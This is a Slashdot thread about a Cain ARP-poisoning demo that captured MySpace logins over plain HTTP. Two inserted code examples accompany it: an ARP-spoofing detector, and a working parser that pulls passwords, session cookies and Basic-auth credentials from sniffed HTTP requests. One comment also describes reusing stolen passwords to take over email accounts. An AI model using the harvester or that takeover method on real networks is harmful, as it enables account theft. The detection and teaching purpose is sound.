Man-in-the-Middle Attack on MySpace with Cain

Posted by CmdrTaco on Saturday March 15, @09:00AM
from the caught-with-yer-pants-down dept.
Slimjim100 writes "Last year at ChicagoCon 2007, Brian Wilson gave a great talk entitled "Cain & Abel: Windows Can Hack, Too!" Although the presentation and audio recording of the talk can be downloaded from the ChicagoCon site at Library, I had totally forgotten to publish his videos. Just in case things didn't go as planned during the live event or his laptop crapped out on him, Brian made a video of the MITM attack he demonstrated using Cain. You get to see how Myspace and other social networking sites are not designed with security in mind."

  • Brian Wilson (Score:3, Funny)

    by Hatta (162192) on Saturday March 15, @09:08AM (#22759052) Journal
    Wow, musically talented and a computer hacker. I guess myspace isn't giving him good vibrations now though.
    • Brian Wilson the influential 1960s music icon, or Brian Wilson the Scottish MP? I'm glad the submitter clarified it for us.
  • Security? (Score:5, Insightful)

    by rbochan (827946) on Saturday March 15, @09:16AM (#22759076) Homepage
    Of course they're not designed with security in mind. They're designed with data mining and ad-hits in mind.

  • Duh.... (Score:1)

    by Anonymous Coward
    HTTP and other plain text protocols vulnerable to MITM, film at 11.

  • And if they used https? (Score:5, Insightful)

    by Henry V .009 (518000) on Saturday March 15, @09:27AM (#22759124) Journal
    And if they used https instead, about .01% of their users would be computer savvy enough to check the certificate when the warning pops up. People just click through. Even technical users simply assume that the certificate was allowed to lapse or something. https is not a panacea for man in the middle attacks.
    • Actually, no, as a technical user, it's incredibly easy to see the reason that the certificate isn't valid -- and if there were shenanigans going on, it wouldn't be because it was expired.

      Also, https means it is actually possible to be secure -- you check
      • Re: (Score:3, Informative)

        The point isn't that you'd get a pop-up when everything's going right - you'd get a pop-up when someone's attempting the man-in-the middle attack. And if the users aren't savvy, or assume as the OP said that the certificate has just expired, they're going
      • Re: (Score:2)

        "When was the last time you got a pop-up visiting your bank, or PayPal etc?"

        Last week: http://www.theregister.co.uk/2008/03/10/hsbc_cert_glitch/ [theregister.co.uk]
        Fortunately, it was not a problem, as people would recognize the site as legitimate anyway. (Well, that's what t
      • Re: (Score:2)

        Exactly. I've trained everyone I know to reject https connections that have cert warnings, based on the reasoning that there is no excuse whatsoever for a med-large site operator to have a lapsed cert.

        And you know what, they HEED my advice. They now have a
  • This is not new (Score:5, Insightful)

    by Cytlid (95255) on Saturday March 15, @09:41AM (#22759170) Homepage
    This is a local ARP poisoning attack.

      What did the notice to Myspace/google etc consist of? I can break things on my local LAN, so fix your site?

      If he did this in my office he'd get a tireiron to the head because I could walk over to him and do it.
    • Re: (Score:2, Interesting)

      What did the notice to Myspace/google etc consist of? I can break things on my local LAN, so fix your site?
      Well, yes.

      The point is that, as you observe, it's trivial on many switched LANs to ARP poison and steal session credentials. (It's all about the session, dummy, not the data.) Pinch a Gmail password from a co-worker and you probably own their domain pa

      • Re: (Score:2)

        Or heighten up the layer 2 security. If I only allow one MAC address per switchport, this wouldn't work. Why fix the remote side when the problem is local? Add some 802.1x authentication, and you're not even getting on my LAN unless you're authenticated
    • I can break things on my local LAN, so fix your site?

      When "my local LAN" is some random wifi hotspot, it would be nice to have it not be broken there.

      And "fix your site" is as simple as sticking https in front of it. Google has this as an option, anyway.
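The attack Cytlid is describing is local ARP-cache poisoning: unsolicited ARP replies that make the victim believe the attacker's MAC is the gateway, and the gateway believe the attacker's MAC is the victim. The replies above argue about whether the fix belongs on the switch (port security, 802.1X) or on the site (HTTPS). An added example, not code from this thread or from Cain & Abel, of the detection side of the same problem: it parses raw Ethernet/ARP frames and flags the moment a second MAC starts answering for an address it has already seen bound elsewhere. All MAC and IP addresses are made up and the "capture" is constructed inline, not taken from a real LAN.

```python
"""ARP-cache poisoning detector over raw Ethernet/ARP frames (added example)."""
import struct
from typing import Dict, List, Optional, Tuple

ETH_P_ARP = 0x0806
ETH_P_IP = 0x0800
ARP_REQUEST, ARP_REPLY = 1, 2


def mac(text: str) -> bytes:
    return bytes.fromhex(text.replace(":", ""))


def ip(text: str) -> bytes:
    return bytes(int(octet) for octet in text.split("."))


def build_arp(opcode: int, smac: str, sip: str, tmac: str, tip: str) -> bytes:
    """Build an Ethernet II frame carrying one IPv4-over-Ethernet ARP packet."""
    dst = mac(tmac) if opcode == ARP_REPLY else b"\xff" * 6  # requests are broadcast
    eth = dst + mac(smac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, ETH_P_IP, 6, 4, opcode)
    return eth + arp + mac(smac) + ip(sip) + mac(tmac) + ip(tip)


def parse_arp(frame: bytes) -> Optional[Tuple[int, str, str, str, str]]:
    """Return (opcode, sender_mac, sender_ip, target_mac, target_ip), or None
    when the frame is not an IPv4-over-Ethernet ARP packet."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, ETH_P_IP, 6, 4):
        return None
    fmt_mac = lambda b: ":".join(f"{x:02x}" for x in b)
    fmt_ip = lambda b: ".".join(str(x) for x in b)
    body = frame[22:42]
    return (opcode, fmt_mac(body[0:6]), fmt_ip(body[6:10]),
            fmt_mac(body[10:16]), fmt_ip(body[16:20]))


class ArpWatch:
    """Track IP -> MAC bindings learned from ARP traffic and report changes.

    A legitimate flip (DHCP lease reuse, NIC swap) also trips this, so the
    hard alert is reserved for addresses declared static, e.g. the gateway.
    """

    def __init__(self, static: Optional[Dict[str, str]] = None):
        self.bindings: Dict[str, str] = dict(static or {})
        self.static = set(static or {})
        self.alerts: List[str] = []

    def observe(self, frame: bytes) -> Optional[str]:
        parsed = parse_arp(frame)
        if parsed is None:
            return None
        opcode, smac, sip, _, _ = parsed
        # Requests and replies both carry the sender's claimed IP->MAC pair;
        # Cain poisons with unsolicited replies, so those are the ones that matter.
        known = self.bindings.get(sip)
        if known is None:
            self.bindings[sip] = smac
            return None
        if known == smac:
            return None
        kind = "GATEWAY-POISON" if sip in self.static else "BINDING-CHANGE"
        msg = f"{kind}: {sip} was {known}, now claimed by {smac} (opcode {opcode})"
        self.alerts.append(msg)
        if sip not in self.static:
            self.bindings[sip] = smac  # accept the change for dynamic hosts, but log it
        return msg


# Constructed addresses for the demo capture (not from any real network).
GATEWAY_MAC, GATEWAY_IP = "00:11:22:33:44:55", "192.168.1.1"
VICTIM_MAC, VICTIM_IP = "aa:bb:cc:dd:ee:01", "192.168.1.50"
ATTACKER_MAC = "de:ad:be:ef:00:01"


def demo_capture() -> List[bytes]:
    """A normal ARP exchange, an unrelated IP frame, then a Cain-style
    bidirectional poison: the attacker claims the gateway to the victim
    and the victim to the gateway."""
    return [
        build_arp(ARP_REQUEST, VICTIM_MAC, VICTIM_IP, "00:00:00:00:00:00", GATEWAY_IP),
        build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
        mac(VICTIM_MAC) + mac(GATEWAY_MAC) + struct.pack("!H", ETH_P_IP) + b"\x45" + b"\x00" * 27,
        build_arp(ARP_REPLY, ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
        build_arp(ARP_REPLY, ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),
    ]


def run_demo() -> List[str]:
    watch = ArpWatch(static={GATEWAY_IP: GATEWAY_MAC})
    for frame in demo_capture():
        watch.observe(frame)
    return watch.alerts


if __name__ == "__main__":
    for alert in run_demo():
        print(alert)
```

On a real host the frames would come from a raw socket or a pcap rather than demo_capture(); the parsing and the binding table are the same. Note that the detector only sees the poison after it has been sent, which is the point the reply about port security is making: a switch that pins one MAC per port stops the attacker's frames from being accepted at all.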

  • Do I understand this correctly? (Score:5, Insightful)

    by bigtallmofo (695287) * on Saturday March 15, @09:43AM (#22759180) Homepage Journal
    He has two systems on his local network. He's using a "man in the middle" attack to use System A to sniff the traffic of System B. Then he's pointing out that you can get passwords from systems like MySpace because it's not encrypted.

    How is this a big deal? This does not allow someone to get anyone's password that isn't on their same network. There are easier ways to get someone's password if you're on the same network as them, starting with slapping them until they give you their password. But it all comes back to - if the site matters, it's using HTTPS.
    • Re: (Score:2)

      Yeah, it's less man-in-the-middle than man-on-the-same-subnet, so it's a particularly easy attack. The tool is quite slick about automating it though, so some definite kudos are deserved. Besides, slapping them repeatedly might reveal your intentions, whil
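bigtallmofo's summary of the demo is the whole mechanism: once System A is in the path, System B's HTTP login goes past it as plain text, and so does the session cookie on every later request. An added example, not from this page or from Cain, of what a passive sniffer pulls out of one reassembled TCP payload: the form fields, the session cookie and any Basic-auth header. The host names, field names, cookie and credentials are all constructed for the example; the third sample is a constructed TLS record start, to show that the same code gets nothing from an HTTPS connection.

```python
"""Credential and session-cookie harvesting from cleartext HTTP (added example)."""
import base64
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs

# Heuristic name fragments worth pulling out of a cleartext request.
CREDENTIAL_FIELDS = ("user", "email", "login", "pass", "pwd")
SESSION_COOKIES = ("sess", "sid", "auth", "token")

Request = Tuple[str, str, Dict[str, str], bytes]


def parse_http_request(payload: bytes) -> Optional[Request]:
    """Split one reassembled HTTP/1.x request into (method, target, headers, body).

    Returns None for anything that is not a complete cleartext request. A TLS
    stream fails here: a ClientHello starts 0x16 0x03, not an ASCII method.
    """
    head, sep, rest = payload.partition(b"\r\n\r\n")
    if not sep:
        return None
    try:
        lines = head.decode("ascii").split("\r\n")
        method, target, version = lines[0].split(" ", 2)
    except (UnicodeDecodeError, ValueError):
        return None
    if not version.startswith("HTTP/1."):
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    try:
        length = int(headers.get("content-length", "0"))
    except ValueError:
        return None
    if len(rest) < length:
        return None  # body not fully reassembled yet
    return method, target, headers, rest[:length]


def harvest(payload: bytes) -> Dict[str, List[str]]:
    """Collect form credentials, session cookies and Basic auth from one request."""
    found: Dict[str, List[str]] = {"form": [], "cookies": [], "basic": []}
    parsed = parse_http_request(payload)
    if parsed is None:
        return found
    method, _target, headers, body = parsed
    if method == "POST" and headers.get("content-type", "").startswith(
            "application/x-www-form-urlencoded"):
        for field, values in parse_qs(body.decode("utf-8", "replace")).items():
            if any(hint in field.lower() for hint in CREDENTIAL_FIELDS):
                found["form"].append(f"{field}={values[0]}")
    # Session cookies matter as much as the password: replaying one logs in
    # without ever knowing the credential.
    for cookie in headers.get("cookie", "").split(";"):
        name, _, value = cookie.strip().partition("=")
        if any(hint in name.lower() for hint in SESSION_COOKIES):
            found["cookies"].append(f"{name}={value}")
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        found["basic"].append(base64.b64decode(auth[6:]).decode("utf-8", "replace"))
    return found


def _request(method: str, target: str, headers: List[Tuple[str, str]], body: bytes = b"") -> bytes:
    head = f"{method} {target} HTTP/1.1\r\n" + "".join(f"{k}: {v}\r\n" for k, v in headers)
    return head.encode("ascii") + b"\r\n" + body


# Constructed sample payloads (hosts, names and secrets are invented).
_LOGIN_BODY = b"email=bob%40example.com&password=bob420"
SAMPLE_LOGIN = _request("POST", "/login", [
    ("Host", "social.example"),
    ("Content-Type", "application/x-www-form-urlencoded"),
    ("Cookie", "SESSIONID=abc123; theme=dark"),
    ("Content-Length", str(len(_LOGIN_BODY))),
], _LOGIN_BODY)
SAMPLE_BASIC = _request("GET", "/mail/", [
    ("Host", "mail.example"),
    ("Authorization", "Basic " + base64.b64encode(b"bob:hunter2").decode("ascii")),
])
SAMPLE_TLS = bytes.fromhex("160301002c0100002803 03".replace(" ", "")) + b"\x00" * 32


if __name__ == "__main__":
    for name, payload in (("login", SAMPLE_LOGIN), ("basic", SAMPLE_BASIC), ("tls", SAMPLE_TLS)):
        print(name, harvest(payload))
```

The TLS sample yields an empty result because nothing past the record header is parseable, which is why the thread keeps coming back to HTTPS: with it, the sniffer on the same subnet has to become an active interceptor and trigger the certificate warning the earlier comments argue about.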
  • Cain and Abel aren't new. (Score:4, Informative)

    by Scytheford (958819) on Saturday March 15, @09:47AM (#22759192)
    Hell, I remember scriptkiddying passwords out of .pwl files in '00. These apps have been around for a long time.
    • Re: (Score:3, Informative)

      Ah yes, back in the day that was all cain could do :-) I remember using ftp in windows to bypass the restrictions on the windows explorer, and cracking all my friends' passwords. Fun times had by all.

      Cain has actually progressed by ridiculous leaps and b
  • Don't use MySpace! (Score:5, Insightful)

    by Doug52392 (1094585) on Saturday March 15, @09:52AM (#22759208)
    MySpace is notoriously insecure and a hacker or spammer's playground. The first thing I noticed when I created an account 10 months ago is that there was no HTTPS logon. Even Facebook has that!

    But even if they were to use HTTPS, that still wouldn't solve MySpace's issues. A lot of the people on my Friends List were not very tech savvy (like a lot of users), and, since most of them were teens, they easily fell for phishing scams and hacks. And then I get punished for their poor security practices by having my message board filled with ads for the "free, HoTtEsT ringtones!!!!" and "see girls naked!!!!" (btw all of those sites had viruses or malware on them). I stopped using MySpace after 2 months, I got tired of all the insecurity.

    If I were to run this attack on the computers at my high school, I could cripple a lot of kids' social lives (and get expelled when the admins see :) I see SO many of my classmates using proxies to get on MySpace at school (even though it's against school rules, which I don't blame after seeing some of my classmates' MySpace pages). They just don't understand how easily I could get their password (or whoever's running the proxy, or even the admins). And it's worse when you wonder how many kids use the same user name and password for everything...

    Kids these days are just not educated enough on good security practices, or show a lack of common sense with this stuff...
    • I set up my own http proxy on my own webserver (well okay it was remotely hosted webspace but w/e) and pw protected it. Too bad it didn't work 100% being HTTP based and not a real proxy but its all good. This was like 10th or 11th grade so I could get onto
  • Surprised?? (Score:3, Insightful)

    by fluch (126140) on Saturday March 15, @10:15AM (#22759338) Homepage
    Honestly? Social sites and security? Why should they be interested in it??
    • Re: (Score:2)

      Because people do stupid things repeatedly.

      Let's say I discovered you had logged on to Facebook with the username of "fluch" and a password of "blather". The next thing I'm going to try is to log on to gmail and try signing on as "fluch@gmail.com" with

  • It gets better (Score:5, Insightful)

    by York the Mysterious (556824) on Saturday March 15, @12:50PM (#22759990) Homepage
    We had always worried about this on University housing networks. You're pretty much guaranteed that every user is a Myspace user. Better yet, once you man in the middle the myspace login / pw, chances are it just gave away their e-mail login too. Login: bob@gmail.com PW: bob420 probably goes to that gmail account too. From there you can reset any account you see in his Gmail account. Myspace really turns into a giant weakness of the Internet.
  • banks. (Score:2)

    The not so funny thing about man in the middle attacks is that most non https sites are vulnerable to them.

    Take the Chase.com [chase.com] homepage. It's got a login form right there (it doesn't matter if it's secure or not). If you were a victim of a man in the mi

    • Re: (Score:2)

      There was a vulnerability in Windows that allowed attackers to remotely install arbitrary CA certificates in the operating system's certificate store without users' knowledge.
      That was an implementation problem with Windows, not with the design of https.